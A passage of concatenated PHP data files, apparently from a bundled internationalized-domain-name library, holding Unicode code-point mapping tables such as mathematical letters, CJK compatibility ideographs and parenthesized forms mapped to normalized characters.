120326 => 'y', 120327 => 'z', 120328 => 'a', 120329 => 'b', 120330 => 'c', 120331 => 'd', 120332 => 'e', 120333 => 'f', 120334 => 'g', 120335 => 'h', 120336 => 'i', 120337 => 'j', 120338 => 'k', 120339 => 'l', 120340 => 'm', 120341 => 'n', 120342 => 'o', 120343 => 'p', 120344 => 'q', 120345 => 'r', 120346 => 's', 120347 => 't', 120348 => 'u', 120349 => 'v', 120350 => 'w', 120351 => 'x', 120352 => 'y', 120353 => 'z', 120354 => 'a', 120355 => 'b', 120356 => 'c', 120357 => 'd', 120358 => 'e', 120359 => 'f', 120360 => 'g', 120361 => 'h', 120362 => 'i', 120363 => 'j', 120364 => 'k', 120365 => 'l', 120366 => 'm', 120367 => 'n', 120368 => 'o', 120369 => 'p', 120370 => 'q', 120371 => 'r', 120372 => 's', 120373 => 't', 120374 => 'u', 120375 => 'v', 120376 => 'w', 120377 => 'x', 120378 => 'y', 120379 => 'z', 120380 => 'a', 120381 => 'b', 120382 => 'c', 120383 => 'd', 120384 => 'e', 120385 => 'f', 120386 => 'g', 120387 => 'h', 120388 => 'i', 120389 => 'j', 120390 => 'k', 120391 => 'l', 120392 => 'm', 120393 => 'n', 120394 => 'o', 120395 => 'p', 120396 => 'q', 120397 => 'r', 120398 => 's', 120399 => 't', 120400 => 'u', 120401 => 'v', 120402 => 'w', 120403 => 'x', 120404 => 'y', 120405 => 'z', 120406 => 'a', 120407 => 'b', 120408 => 'c', 120409 => 'd', 120410 => 'e', 120411 => 'f', 120412 => 'g', 120413 => 'h', 120414 => 'i', 120415 => 'j', 120416 => 'k', 120417 => 'l', 120418 => 'm', 120419 => 'n', 120420 => 'o', 120421 => 'p', 120422 => 'q', 120423 => 'r', 120424 => 's', 120425 => 't', 120426 => 'u', 120427 => 'v', 120428 => 'w', 120429 => 'x', 120430 => 'y', 120431 => 'z', 120432 => 'a', 120433 => 'b', 120434 => 'c', 120435 => 'd', 120436 => 'e', 120437 => 'f', 120438 => 'g', 120439 => 'h', 120440 => 'i', 120441 => 'j', 120442 => 'k', 120443 => 'l', 120444 => 'm', 120445 => 'n', 120446 => 'o', 120447 => 'p', 120448 => 'q', 120449 => 'r', 120450 => 's', 120451 => 't', 120452 => 'u', 120453 => 'v', 120454 => 'w', 120455 => 'x', 120456 => 'y', 120457 => 'z', 120458 => 'a', 120459 => 'b', 120460 => 'c', 120461 => 'd', 120462 => 'e', 120463 => 'f', 120464 => 'g', 120465 => 'h', 120466 => 'i', 120467 => 'j', 120468 => 'k', 120469 => 'l', 120470 => 'm', 120471 => 'n', 120472 => 'o', 120473 => 'p', 120474 => 'q', 120475 => 'r', 120476 => 's', 120477 => 't', 120478 => 'u', 120479 => 'v', 120480 => 'w', 120481 => 'x', 120482 => 'y', 120483 => 'z', 120484 => 'ı', 120485 => 'ȷ', 120488 => 'α', 120489 => 'β', 120490 => 'γ', 120491 => 'δ', 120492 => 'ε', 120493 => 'ζ', 120494 => 'η', 120495 => 'θ', 120496 => 'ι', 120497 => 'κ', 120498 => 'λ', 120499 => 'μ', 120500 => 'ν', 120501 => 'ξ', 120502 => 'ο', 120503 => 'π', 120504 => 'ρ', 120505 => 'θ', 120506 => 'σ', 120507 => 'τ', 120508 => 'υ', 120509 => 'φ', 120510 => 'χ', 120511 => 'ψ', 120512 => 'ω', 120513 => '∇', 120514 => 'α', 120515 => 'β', 120516 => 'γ', 120517 => 'δ', 120518 => 'ε', 120519 => 'ζ', 120520 => 'η', 120521 => 'θ', 120522 => 'ι', 120523 => 'κ', 120524 => 'λ', 120525 => 'μ', 120526 => 'ν', 120527 => 'ξ', 120528 => 'ο', 120529 => 'π', 120530 => 'ρ', 120531 => 'σ', 120532 => 'σ', 120533 => 'τ', 120534 => 'υ', 120535 => 'φ', 120536 => 'χ', 120537 => 'ψ', 120538 => 'ω', 120539 => '∂', 120540 => 'ε', 120541 => 'θ', 120542 => 'κ', 120543 => 'φ', 120544 => 'ρ', 120545 => 'π', 120546 => 'α', 120547 => 'β', 120548 => 'γ', 120549 => 'δ', 120550 => 'ε', 120551 => 'ζ', 120552 => 'η', 120553 => 'θ', 120554 => 'ι', 120555 => 'κ', 120556 => 'λ', 120557 => 'μ', 120558 => 'ν', 120559 => 'ξ', 120560 => 'ο', 120561 => 'π', 120562 => 'ρ', 120563 => 'θ', 120564 => 'σ', 120565 => 'τ', 120566 => 'υ', 120567 => 'φ', 120568 => 'χ', 120569 => 'ψ', 120570 => 'ω', 120571 => '∇', 120572 => 'α', 120573 => 'β', 120574 => 'γ', 120575 => 'δ', 120576 => 'ε', 120577 => 'ζ', 120578 => 'η', 120579 => 'θ', 120580 => 'ι', 120581 => 'κ', 120582 => 'λ', 120583 => 'μ', 120584 => 'ν', 120585 => 'ξ', 120586 => 'ο', 120587 => 'π', 120588 => 'ρ', 120589 => 'σ', 120590 => 'σ', 120591 => 'τ', 120592 => 'υ', 120593 => 'φ', 120594 => 'χ', 120595 => 'ψ', 120596 => 'ω', 120597 => '∂', 120598 => 'ε', 120599 => 'θ', 120600 => 'κ', 120601 => 'φ', 120602 => 'ρ', 120603 => 'π', 120604 => 'α', 120605 => 'β', 120606 => 'γ', 120607 => 'δ', 120608 => 'ε', 120609 => 'ζ', 120610 => 'η', 120611 => 'θ', 120612 => 'ι', 120613 => 'κ', 120614 => 'λ', 120615 => 'μ', 120616 => 'ν', 120617 => 'ξ', 120618 => 'ο', 120619 => 'π', 120620 => 'ρ', 120621 => 'θ', 120622 => 'σ', 120623 => 'τ', 120624 => 'υ', 120625 => 'φ', 120626 => 'χ', 120627 => 'ψ', 120628 => 'ω', 120629 => '∇', 120630 => 'α', 120631 => 'β', 120632 => 'γ', 120633 => 'δ', 120634 => 'ε', 120635 => 'ζ', 120636 => 'η', 120637 => 'θ', 120638 => 'ι', 120639 => 'κ', 120640 => 'λ', 120641 => 'μ', 120642 => 'ν', 120643 => 'ξ', 120644 => 'ο', 120645 => 'π', 120646 => 'ρ', 120647 => 'σ', 120648 => 'σ', 120649 => 'τ', 120650 => 'υ', 120651 => 'φ', 120652 => 'χ', 120653 => 'ψ', 120654 => 'ω', 120655 => '∂', 120656 => 'ε', 120657 => 'θ', 120658 => 'κ', 120659 => 'φ', 120660 => 'ρ', 120661 => 'π', 120662 => 'α', 120663 => 'β', 120664 => 'γ', 120665 => 'δ', 120666 => 'ε', 120667 => 'ζ', 120668 => 'η', 120669 => 'θ', 120670 => 'ι', 120671 => 'κ', 120672 => 'λ', 120673 => 'μ', 120674 => 'ν', 120675 => 'ξ', 120676 => 'ο', 120677 => 'π', 120678 => 'ρ', 120679 => 'θ', 120680 => 'σ', 120681 => 'τ', 120682 => 'υ', 120683 => 'φ', 120684 => 'χ', 120685 => 'ψ', 120686 => 'ω', 120687 => '∇', 120688 => 'α', 120689 => 'β', 120690 => 'γ', 120691 => 'δ', 120692 => 'ε', 120693 => 'ζ', 120694 => 'η', 120695 => 'θ', 120696 => 'ι', 120697 => 'κ', 120698 => 'λ', 120699 => 'μ', 120700 => 'ν', 120701 => 'ξ', 120702 => 'ο', 120703 => 'π', 120704 => 'ρ', 120705 => 'σ', 120706 => 'σ', 120707 => 'τ', 120708 => 'υ', 120709 => 'φ', 120710 => 'χ', 120711 => 'ψ', 120712 => 'ω', 120713 => '∂', 120714 => 'ε', 120715 => 'θ', 120716 => 'κ', 120717 => 'φ', 120718 => 'ρ', 120719 => 'π', 120720 => 'α', 120721 => 'β', 120722 => 'γ', 120723 => 'δ', 120724 => 'ε', 120725 => 'ζ', 120726 => 'η', 120727 => 'θ', 120728 => 'ι', 120729 => 'κ', 120730 => 'λ', 120731 => 'μ', 120732 => 'ν', 120733 => 'ξ', 120734 => 'ο', 120735 => 'π', 120736 => 'ρ', 120737 => 'θ', 120738 => 'σ', 120739 => 'τ', 120740 => 'υ', 120741 => 'φ', 120742 => 'χ', 120743 => 'ψ', 120744 => 'ω', 120745 => '∇', 120746 => 'α', 120747 => 'β', 120748 => 'γ', 120749 => 'δ', 120750 => 'ε', 120751 => 'ζ', 120752 => 'η', 120753 => 'θ', 120754 => 'ι', 120755 => 'κ', 120756 => 'λ', 120757 => 'μ', 120758 => 'ν', 120759 => 'ξ', 120760 => 'ο', 120761 => 'π', 120762 => 'ρ', 120763 => 'σ', 120764 => 'σ', 120765 => 'τ', 120766 => 'υ', 120767 => 'φ', 120768 => 'χ', 120769 => 'ψ', 120770 => 'ω', 120771 => '∂', 120772 => 'ε', 120773 => 'θ', 120774 => 'κ', 120775 => 'φ', 120776 => 'ρ', 120777 => 'π', 120778 => 'ϝ', 120779 => 'ϝ', 120782 => '0', 120783 => '1', 120784 => '2', 120785 => '3', 120786 => '4', 120787 => '5', 120788 => '6', 120789 => '7', 120790 => '8', 120791 => '9', 120792 => '0', 120793 => '1', 120794 => '2', 120795 => '3', 120796 => '4', 120797 => '5', 120798 => '6', 120799 => '7', 120800 => '8', 120801 => '9', 120802 => '0', 120803 => '1', 120804 => '2', 120805 => '3', 120806 => '4', 120807 => '5', 120808 => '6', 120809 => '7', 120810 => '8', 120811 => '9', 120812 => '0', 120813 => '1', 120814 => '2', 120815 => '3', 120816 => '4', 120817 => '5', 120818 => '6', 120819 => '7', 120820 => '8', 120821 => '9', 120822 => '0', 120823 => '1', 120824 => '2', 120825 => '3', 120826 => '4', 120827 => '5', 120828 => '6', 120829 => '7', 120830 => '8', 120831 => '9', 125184 => '𞤢', 125185 => '𞤣', 125186 => '𞤤', 125187 => '𞤥', 125188 => '𞤦', 125189 => '𞤧', 125190 => '𞤨', 125191 => '𞤩', 125192 => '𞤪', 125193 => '𞤫', 125194 => '𞤬', 125195 => '𞤭', 125196 => '𞤮', 125197 => '𞤯', 125198 => '𞤰', 125199 => '𞤱', 125200 => '𞤲', 125201 => '𞤳', 125202 => '𞤴', 125203 => '𞤵', 125204 => '𞤶', 125205 => '𞤷', 125206 => '𞤸', 125207 => '𞤹', 125208 => '𞤺', 125209 => '𞤻', 125210 => '𞤼', 125211 => '𞤽', 125212 => '𞤾', 125213 => '𞤿', 125214 => '𞥀', 125215 => '𞥁', 125216 => '𞥂', 125217 => '𞥃', 126464 => 'ا', 126465 => 'ب', 126466 => 'ج', 126467 => 'د', 126469 => 'و', 126470 => 'ز', 126471 => 'ح', 126472 => 'ط', 126473 => 'ي', 126474 => 'ك', 126475 => 'ل', 126476 => 'م', 126477 => 'ن', 126478 => 'س', 126479 => 'ع', 126480 => 'ف', 126481 => 'ص', 126482 => 'ق', 126483 => 'ر', 126484 => 'ش', 126485 => 'ت', 126486 => 'ث', 126487 => 'خ', 126488 => 'ذ', 126489 => 'ض', 126490 => 'ظ', 126491 => 'غ', 126492 => 'ٮ', 126493 => 'ں', 126494 => 'ڡ', 126495 => 'ٯ', 126497 => 'ب', 126498 => 'ج', 126500 => 'ه', 126503 => 'ح', 126505 => 'ي', 126506 => 'ك', 126507 => 'ل', 126508 => 'م', 126509 => 'ن', 126510 => 'س', 126511 => 'ع', 126512 => 'ف', 126513 => 'ص', 126514 => 'ق', 126516 => 'ش', 126517 => 'ت', 126518 => 'ث', 126519 => 'خ', 126521 => 'ض', 126523 => 'غ', 126530 => 'ج', 126535 => 'ح', 126537 => 'ي', 126539 => 'ل', 126541 => 'ن', 126542 => 'س', 126543 => 'ع', 126545 => 'ص', 126546 => 'ق', 126548 => 'ش', 126551 => 'خ', 126553 => 'ض', 126555 => 'غ', 126557 => 'ں', 126559 => 'ٯ', 126561 => 'ب', 126562 => 'ج', 126564 => 'ه', 126567 => 'ح', 126568 => 'ط', 126569 => 'ي', 126570 => 'ك', 126572 => 'م', 126573 => 'ن', 126574 => 'س', 126575 => 'ع', 126576 => 'ف', 126577 => 'ص', 126578 => 'ق', 126580 => 'ش', 126581 => 'ت', 126582 => 'ث', 126583 => 'خ', 126585 => 'ض', 126586 => 'ظ', 126587 => 'غ', 126588 => 'ٮ', 126590 => 'ڡ', 126592 => 'ا', 126593 => 'ب', 126594 => 'ج', 126595 => 'د', 126596 => 'ه', 126597 => 'و', 126598 => 'ز', 126599 => 'ح', 126600 => 'ط', 126601 => 'ي', 126603 => 'ل', 126604 => 'م', 126605 => 'ن', 126606 => 'س', 126607 => 'ع', 126608 => 'ف', 126609 => 'ص', 126610 => 'ق', 126611 => 'ر', 126612 => 'ش', 126613 => 'ت', 126614 => 'ث', 126615 => 'خ', 126616 => 'ذ', 126617 => 'ض', 126618 => 'ظ', 126619 => 'غ', 126625 => 'ب', 126626 => 'ج', 126627 => 'د', 126629 => 'و', 126630 => 'ز', 126631 => 'ح', 126632 => 'ط', 126633 => 'ي', 126635 => 'ل', 126636 => 'م', 126637 => 'ن', 126638 => 'س', 126639 => 'ع', 126640 => 'ف', 126641 => 'ص', 126642 => 'ق', 126643 => 'ر', 126644 => 'ش', 126645 => 'ت', 126646 => 'ث', 126647 => 'خ', 126648 => 'ذ', 126649 => 'ض', 126650 => 'ظ', 126651 => 'غ', 127274 => '〔s〕', 127275 => 'c', 127276 => 'r', 127277 => 'cd', 127278 => 'wz', 127280 => 'a', 127281 => 'b', 127282 => 'c', 127283 => 'd', 127284 => 'e', 127285 => 'f', 127286 => 'g', 127287 => 'h', 127288 => 'i', 127289 => 'j', 127290 => 'k', 127291 => 'l', 127292 => 'm', 127293 => 'n', 127294 => 'o', 127295 => 'p', 127296 => 'q', 127297 => 'r', 127298 => 's', 127299 => 't', 127300 => 'u', 127301 => 'v', 127302 => 'w', 127303 => 'x', 127304 => 'y', 127305 => 'z', 127306 => 'hv', 127307 => 'mv', 127308 => 'sd', 127309 => 'ss', 127310 => 'ppv', 127311 => 'wc', 127338 => 'mc', 127339 => 'md', 127340 => 'mr', 127376 => 'dj', 127488 => 'ほか', 127489 => 'ココ', 127490 => 'サ', 127504 => '手', 127505 => '字', 127506 => '双', 127507 => 'デ', 127508 => '二', 127509 => '多', 127510 => '解', 127511 => '天', 127512 => '交', 127513 => '映', 127514 => '無', 127515 => '料', 127516 => '前', 127517 => '後', 127518 => '再', 127519 => '新', 127520 => '初', 127521 => '終', 127522 => '生', 127523 => '販', 127524 => '声', 127525 => '吹', 127526 => '演', 127527 => '投', 127528 => '捕', 127529 => '一', 127530 => '三', 127531 => '遊', 127532 => '左', 127533 => '中', 127534 => '右', 127535 => '指', 127536 => '走', 127537 => '打', 127538 => '禁', 127539 => '空', 127540 => '合', 127541 => '満', 127542 => '有', 127543 => '月', 127544 => '申', 127545 => '割', 127546 => '営', 127547 => '配', 127552 => '〔本〕', 127553 => '〔三〕', 127554 => '〔二〕', 127555 => '〔安〕', 127556 => '〔点〕', 127557 => '〔打〕', 127558 => '〔盗〕', 127559 => '〔勝〕', 127560 => '〔敗〕', 127568 => '得', 127569 => '可', 130032 => '0', 130033 => '1', 130034 => '2', 130035 => '3', 130036 => '4', 130037 => '5', 130038 => '6', 130039 => '7', 130040 => '8', 130041 => '9', 194560 => '丽', 194561 => '丸', 194562 => '乁', 194563 => '𠄢', 194564 => '你', 194565 => '侮', 194566 => '侻', 194567 => '倂', 194568 => '偺', 194569 => '備', 194570 => '僧', 194571 => '像', 194572 => '㒞', 194573 => '𠘺', 194574 => '免', 194575 => '兔', 194576 => '兤', 194577 => '具', 194578 => '𠔜', 194579 => '㒹', 194580 => '內', 194581 => '再', 194582 => '𠕋', 194583 => '冗', 194584 => '冤', 194585 => '仌', 194586 => '冬', 194587 => '况', 194588 => '𩇟', 194589 => '凵', 194590 => '刃', 194591 => '㓟', 194592 => '刻', 194593 => '剆', 194594 => '割', 194595 => '剷', 194596 => '㔕', 194597 => '勇', 194598 => '勉', 194599 => '勤', 194600 => '勺', 194601 => '包', 194602 => '匆', 194603 => '北', 194604 => '卉', 194605 => '卑', 194606 => '博', 194607 => '即', 194608 => '卽', 194609 => '卿', 194610 => '卿', 194611 => '卿', 194612 => '𠨬', 194613 => '灰', 194614 => '及', 194615 => '叟', 194616 => '𠭣', 194617 => '叫', 194618 => '叱', 194619 => '吆', 194620 => '咞', 194621 => '吸', 194622 => '呈', 194623 => '周', 194624 => '咢', 194625 => '哶', 194626 => '唐', 194627 => '啓', 194628 => '啣', 194629 => '善', 194630 => '善', 194631 => '喙', 194632 => '喫', 194633 => '喳', 194634 => '嗂', 194635 => '圖', 194636 => '嘆', 194637 => '圗', 194638 => '噑', 194639 => '噴', 194640 => '切', 194641 => '壮', 194642 => '城', 194643 => '埴', 194644 => '堍', 194645 => '型', 194646 => '堲', 194647 => '報', 194648 => '墬', 194649 => '𡓤', 194650 => '売', 194651 => '壷', 194652 => '夆', 194653 => '多', 194654 => '夢', 194655 => '奢', 194656 => '𡚨', 194657 => '𡛪', 194658 => '姬', 194659 => '娛', 194660 => '娧', 194661 => '姘', 194662 => '婦', 194663 => '㛮', 194665 => '嬈', 194666 => '嬾', 194667 => '嬾', 194668 => '𡧈', 194669 => '寃', 194670 => '寘', 194671 => '寧', 194672 => '寳', 194673 => '𡬘', 194674 => '寿', 194675 => '将', 194677 => '尢', 194678 => '㞁', 194679 => '屠', 194680 => '屮', 194681 => '峀', 194682 => '岍', 194683 => '𡷤', 194684 => '嵃', 194685 => '𡷦', 194686 => '嵮', 194687 => '嵫', 194688 => '嵼', 194689 => '巡', 194690 => '巢', 194691 => '㠯', 194692 => '巽', 194693 => '帨', 194694 => '帽', 194695 => '幩', 194696 => '㡢', 194697 => '𢆃', 194698 => '㡼', 194699 => '庰', 194700 => '庳', 194701 => '庶', 194702 => '廊', 194703 => '𪎒', 194704 => '廾', 194705 => '𢌱', 194706 => '𢌱', 194707 => '舁', 194708 => '弢', 194709 => '弢', 194710 => '㣇', 194711 => '𣊸', 194712 => '𦇚', 194713 => '形', 194714 => '彫', 194715 => '㣣', 194716 => '徚', 194717 => '忍', 194718 => '志', 194719 => '忹', 194720 => '悁', 194721 => '㤺', 194722 => '㤜', 194723 => '悔', 194724 => '𢛔', 194725 => '惇', 194726 => '慈', 194727 => '慌', 194728 => '慎', 194729 => '慌', 194730 => '慺', 194731 => '憎', 194732 => '憲', 194733 => '憤', 194734 => '憯', 194735 => '懞', 194736 => '懲', 194737 => '懶', 194738 => '成', 194739 => '戛', 194740 => '扝', 194741 => '抱', 194742 => '拔', 194743 => '捐', 194744 => '𢬌', 194745 => '挽', 194746 => '拼', 194747 => '捨', 194748 => '掃', 194749 => '揤', 194750 => '𢯱', 194751 => '搢', 194752 => '揅', 194753 => '掩', 194754 => '㨮', 194755 => '摩', 194756 => '摾', 194757 => '撝', 194758 => '摷', 194759 => '㩬', 194760 => '敏', 194761 => '敬', 194762 => '𣀊', 194763 => '旣', 194764 => '書', 194765 => '晉', 194766 => '㬙', 194767 => '暑', 194768 => '㬈', 194769 => '㫤', 194770 => '冒', 194771 => '冕', 194772 => '最', 194773 => '暜', 194774 => '肭', 194775 => '䏙', 194776 => '朗', 194777 => '望', 194778 => '朡', 194779 => '杞', 194780 => '杓', 194781 => '𣏃', 194782 => '㭉', 194783 => '柺', 194784 => '枅', 194785 => '桒', 194786 => '梅', 194787 => '𣑭', 194788 => '梎', 194789 => '栟', 194790 => '椔', 194791 => '㮝', 194792 => '楂', 194793 => '榣', 194794 => '槪', 194795 => '檨', 194796 => '𣚣', 194797 => '櫛', 194798 => '㰘', 194799 => '次', 194800 => '𣢧', 194801 => '歔', 194802 => '㱎', 194803 => '歲', 194804 => '殟', 194805 => '殺', 194806 => '殻', 194807 => '𣪍', 194808 => '𡴋', 194809 => '𣫺', 194810 => '汎', 194811 => '𣲼', 194812 => '沿', 194813 => '泍', 194814 => '汧', 194815 => '洖', 194816 => '派', 194817 => '海', 194818 => '流', 194819 => '浩', 194820 => '浸', 194821 => '涅', 194822 => '𣴞', 194823 => '洴', 194824 => '港', 194825 => '湮', 194826 => '㴳', 194827 => '滋', 194828 => '滇', 194829 => '𣻑', 194830 => '淹', 194831 => '潮', 194832 => '𣽞', 194833 => '𣾎', 194834 => '濆', 194835 => '瀹', 194836 => '瀞', 194837 => '瀛', 194838 => '㶖', 194839 => '灊', 194840 => '災', 194841 => '灷', 194842 => '炭', 194843 => '𠔥', 194844 => '煅', 194845 => '𤉣', 194846 => '熜', 194848 => '爨', 194849 => '爵', 194850 => '牐', 194851 => '𤘈', 194852 => '犀', 194853 => '犕', 194854 => '𤜵', 194855 => '𤠔', 194856 => '獺', 194857 => '王', 194858 => '㺬', 194859 => '玥', 194860 => '㺸', 194861 => '㺸', 194862 => '瑇', 194863 => '瑜', 194864 => '瑱', 194865 => '璅', 194866 => '瓊', 194867 => '㼛', 194868 => '甤', 194869 => '𤰶', 194870 => '甾', 194871 => '𤲒', 194872 => '異', 194873 => '𢆟', 194874 => '瘐', 194875 => '𤾡', 194876 => '𤾸', 194877 => '𥁄', 194878 => '㿼', 194879 => '䀈', 194880 => '直', 194881 => '𥃳', 194882 => '𥃲', 194883 => '𥄙', 194884 => '𥄳', 194885 => '眞', 194886 => '真', 194887 => '真', 194888 => '睊', 194889 => '䀹', 194890 => '瞋', 194891 => '䁆', 194892 => '䂖', 194893 => '𥐝', 194894 => '硎', 194895 => '碌', 194896 => '磌', 194897 => '䃣', 194898 => '𥘦', 194899 => '祖', 194900 => '𥚚', 194901 => '𥛅', 194902 => '福', 194903 => '秫', 194904 => '䄯', 194905 => '穀', 194906 => '穊', 194907 => '穏', 194908 => '𥥼', 194909 => '𥪧', 194910 => '𥪧', 194912 => '䈂', 194913 => '𥮫', 194914 => '篆', 194915 => '築', 194916 => '䈧', 194917 => '𥲀', 194918 => '糒', 194919 => '䊠', 194920 => '糨', 194921 => '糣', 194922 => '紀', 194923 => '𥾆', 194924 => '絣', 194925 => '䌁', 194926 => '緇', 194927 => '縂', 194928 => '繅', 194929 => '䌴', 194930 => '𦈨', 194931 => '𦉇', 194932 => '䍙', 194933 => '𦋙', 194934 => '罺', 194935 => '𦌾', 194936 => '羕', 194937 => '翺', 194938 => '者', 194939 => '𦓚', 194940 => '𦔣', 194941 => '聠', 194942 => '𦖨', 194943 => '聰', 194944 => '𣍟', 194945 => '䏕', 194946 => '育', 194947 => '脃', 194948 => '䐋', 194949 => '脾', 194950 => '媵', 194951 => '𦞧', 194952 => '𦞵', 194953 => '𣎓', 194954 => '𣎜', 194955 => '舁', 194956 => '舄', 194957 => '辞', 194958 => '䑫', 194959 => '芑', 194960 => '芋', 194961 => '芝', 194962 => '劳', 194963 => '花', 194964 => '芳', 194965 => '芽', 194966 => '苦', 194967 => '𦬼', 194968 => '若', 194969 => '茝', 194970 => '荣', 194971 => '莭', 194972 => '茣', 194973 => '莽', 194974 => '菧', 194975 => '著', 194976 => '荓', 194977 => '菊', 194978 => '菌', 194979 => '菜', 194980 => '𦰶', 194981 => '𦵫', 194982 => '𦳕', 194983 => '䔫', 194984 => '蓱', 194985 => '蓳', 194986 => '蔖', 194987 => '𧏊', 194988 => '蕤', 194989 => '𦼬', 194990 => '䕝', 194991 => '䕡', 194992 => '𦾱', 194993 => '𧃒', 194994 => '䕫', 194995 => '虐', 194996 => '虜', 194997 => '虧', 194998 => '虩', 194999 => '蚩', 195000 => '蚈', 195001 => '蜎', 195002 => '蛢', 195003 => '蝹', 195004 => '蜨', 195005 => '蝫', 195006 => '螆', 195008 => '蟡', 195009 => '蠁', 195010 => '䗹', 195011 => '衠', 195012 => '衣', 195013 => '𧙧', 195014 => '裗', 195015 => '裞', 195016 => '䘵', 195017 => '裺', 195018 => '㒻', 195019 => '𧢮', 195020 => '𧥦', 195021 => '䚾', 195022 => '䛇', 195023 => '誠', 195024 => '諭', 195025 => '變', 195026 => '豕', 195027 => '𧲨', 195028 => '貫', 195029 => '賁', 195030 => '贛', 195031 => '起', 195032 => '𧼯', 195033 => '𠠄', 195034 => '跋', 195035 => '趼', 195036 => '跰', 195037 => '𠣞', 195038 => '軔', 195039 => '輸', 195040 => '𨗒', 195041 => '𨗭', 195042 => '邔', 195043 => '郱', 195044 => '鄑', 195045 => '𨜮', 195046 => '鄛', 195047 => '鈸', 195048 => '鋗', 195049 => '鋘', 195050 => '鉼', 195051 => '鏹', 195052 => '鐕', 195053 => '𨯺', 195054 => '開', 195055 => '䦕', 195056 => '閷', 195057 => '𨵷', 195058 => '䧦', 195059 => '雃', 195060 => '嶲', 195061 => '霣', 195062 => '𩅅', 195063 => '𩈚', 195064 => '䩮', 195065 => '䩶', 195066 => '韠', 195067 => '𩐊', 195068 => '䪲', 195069 => '𩒖', 195070 => '頋', 195071 => '頋', 195072 => '頩', 195073 => '𩖶', 195074 => '飢', 195075 => '䬳', 195076 => '餩', 195077 => '馧', 195078 => '駂', 195079 => '駾', 195080 => '䯎', 195081 => '𩬰', 195082 => '鬒', 195083 => '鱀', 195084 => '鳽', 195085 => '䳎', 195086 => '䳭', 195087 => '鵧', 195088 => '𪃎', 195089 => '䳸', 195090 => '𪄅', 195091 => '𪈎', 195092 => '𪊑', 195093 => '麻', 195094 => '䵖', 195095 => '黹', 195096 => '黾', 195097 => '鼅', 195098 => '鼏', 195099 => '鼖', 195100 => '鼻', 195101 => '𪘀'); <?php namespace Google\Site_Kit_Dependencies; return array(0 => \true, 1 => \true, 2 => \true, 3 => \true, 4 => \true, 5 => \true, 6 => \true, 7 => \true, 8 => \true, 9 => \true, 10 => \true, 11 => \true, 12 => \true, 13 => \true, 14 => \true, 15 => \true, 16 => \true, 17 => \true, 18 => \true, 19 => \true, 20 => \true, 21 => \true, 22 => \true, 23 => \true, 24 => \true, 25 => \true, 26 => \true, 27 => \true, 28 => \true, 29 => \true, 30 => \true, 31 => \true, 32 => \true, 33 => \true, 34 => \true, 35 => \true, 36 => \true, 37 => \true, 38 => \true, 39 => \true, 40 => \true, 41 => \true, 42 => \true, 43 => \true, 44 => \true, 47 => \true, 58 => \true, 59 => \true, 60 => \true, 61 => \true, 62 => \true, 63 => \true, 64 => \true, 91 => \true, 92 => \true, 93 => \true, 94 => \true, 95 => \true, 96 => \true, 123 => \true, 124 => \true, 125 => \true, 126 => \true, 127 => \true, 8800 => \true, 8814 => \true, 8815 => \true); <?php namespace Google\Site_Kit_Dependencies; return array(223 => 'ss', 962 => 'σ', 8204 => '', 8205 => ''); <?php namespace Google\Site_Kit_Dependencies; return array(160 => ' ', 168 => ' ̈', 175 => ' ̄', 180 => ' ́', 184 => ' ̧', 728 => ' ̆', 729 => ' ̇', 730 => ' ̊', 731 => ' ̨', 732 => ' ̃', 733 => ' ̋', 890 => ' ι', 894 => ';', 900 => ' ́', 901 => ' ̈́', 8125 => ' ̓', 8127 => ' ̓', 8128 => ' ͂', 8129 => ' ̈͂', 8141 => ' ̓̀', 8142 => ' ̓́', 8143 => ' ̓͂', 8157 => ' ̔̀', 8158 => ' ̔́', 8159 => ' ̔͂', 8173 => ' ̈̀', 8174 => ' ̈́', 8175 => '`', 8189 => ' ́', 8190 => ' ̔', 8192 => ' ', 8193 => ' ', 8194 => ' ', 8195 => ' ', 8196 => ' ', 8197 => ' ', 8198 => ' ', 8199 => ' ', 8200 => ' ', 8201 => ' ', 8202 => ' ', 8215 => ' ̳', 8239 => ' ', 8252 => '!!', 8254 => ' ̅', 8263 => '??', 8264 => '?!', 8265 => '!?', 8287 => ' ', 8314 => '+', 8316 => '=', 8317 => '(', 8318 => ')', 8330 => '+', 8332 => '=', 8333 => '(', 8334 => ')', 8448 => 'a/c', 8449 => 'a/s', 8453 => 'c/o', 8454 => 'c/u', 9332 => '(1)', 9333 => '(2)', 9334 => '(3)', 9335 => '(4)', 9336 => '(5)', 9337 => '(6)', 9338 => '(7)', 9339 => '(8)', 9340 => '(9)', 9341 => '(10)', 9342 => '(11)', 9343 => '(12)', 9344 => '(13)', 9345 => '(14)', 9346 => '(15)', 9347 => '(16)', 9348 => '(17)', 9349 => '(18)', 9350 => '(19)', 9351 => '(20)', 9372 => '(a)', 9373 => '(b)', 9374 => '(c)', 9375 => '(d)', 9376 => '(e)', 9377 => '(f)', 9378 => '(g)', 9379 => '(h)', 9380 => '(i)', 9381 => '(j)', 9382 => '(k)', 9383 => '(l)', 9384 => '(m)', 9385 => '(n)', 9386 => '(o)', 9387 => '(p)', 9388 => '(q)', 9389 => '(r)', 9390 => '(s)', 9391 => '(t)', 9392 => '(u)', 9393 => '(v)', 9394 => '(w)', 9395 => '(x)', 9396 => '(y)', 9397 => '(z)', 10868 => '::=', 10869 => '==', 10870 => '===', 12288 => ' ', 12443 => ' ゙', 12444 => ' ゚', 12800 => '(ᄀ)', 12801 => '(ᄂ)', 12802 => '(ᄃ)', 12803 => '(ᄅ)', 12804 => '(ᄆ)', 12805 => '(ᄇ)', 12806 => '(ᄉ)', 12807 => '(ᄋ)', 12808 => '(ᄌ)', 12809 => '(ᄎ)', 12810 => '(ᄏ)', 12811 => '(ᄐ)', 12812 => '(ᄑ)', 12813 => '(ᄒ)', 12814 => '(가)', 12815 => '(나)', 12816 => '(다)', 12817 => '(라)', 12818 => '(마)', 12819 => '(바)', 12820 => '(사)', 12821 => '(아)', 12822 => '(자)', 12823 => '(차)', 12824 => '(카)', 12825 => '(타)', 12826 => '(파)', 12827 => '(하)', 12828 => '(주)', 12829 => '(오전)', 12830 => '(오후)', 12832 => '(一)', 12833 => '(二)', 12834 => '(三)', 12835 => '(四)', 12836 => '(五)', 12837 => '(六)', 12838 => '(七)', 12839 => '(八)', 12840 => '(九)', 12841 => '(十)', 12842 => '(月)', 12843 => '(火)', 12844 => '(水)', 12845 => '(木)', 12846 => '(金)', 12847 => '(土)', 12848 => '(日)', 12849 => '(株)', 12850 => '(有)', 12851 => '(社)', 12852 => '(名)', 12853 => '(特)', 12854 => '(財)', 12855 => '(祝)', 12856 => '(労)', 12857 => '(代)', 12858 => '(呼)', 12859 => '(学)', 12860 => '(監)', 12861 => '(企)', 12862 => '(資)', 12863 => '(協)', 